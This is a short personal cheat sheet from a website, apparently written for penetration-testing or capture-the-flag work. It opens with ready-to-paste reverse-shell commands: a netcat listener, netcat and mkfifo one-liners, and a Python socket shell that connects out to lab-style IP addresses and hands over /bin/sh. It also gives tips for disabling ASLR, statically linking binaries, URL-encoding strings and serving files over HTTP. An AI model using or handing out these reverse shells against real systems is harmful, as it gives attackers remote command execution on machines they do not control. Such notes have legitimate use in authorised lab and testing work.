The Official Site of David Guest

cheat sheet

A collection of things to make life easier…

Reverse Shell

# Listener
nc -nlvp 4444

# Victim (simple netcat)
nc <listener IP> 4444 -e /bin/sh

# Victim (netcat with no -e support)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4545 >/tmp/f

# Victim (Python)
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Statically link a binary

You’ll need Statifier (http://statifier.sourceforge.net/) and some dependancies. On Kali:

sudo apt-get install gcc-multilib

# In statifier directory:
make
make install

To use:

printf 0 | sudo tee /proc/sys/kernel/randomize_va_space
statifier <input exe> <output exe>

URL encode everything

echo thisisareallylongstring. | xxd -p|tr -d \\n|sed 's/../%&/g'
%74%68%69%73%69%73%61%72%65%61%6c%6c%79%6c%6f%6e%67%73%74%72%69%6e%67%2e%0a 

Python HTTP Servers

python3 -m http.server

python -m SimpleHTTPServer

Execute a command using input from elsewhere

while read line; do <command> $line; done < <file>
curl -s http://example.com/ | <cut/sort/etc> | while read -r line; do <command> $line ; done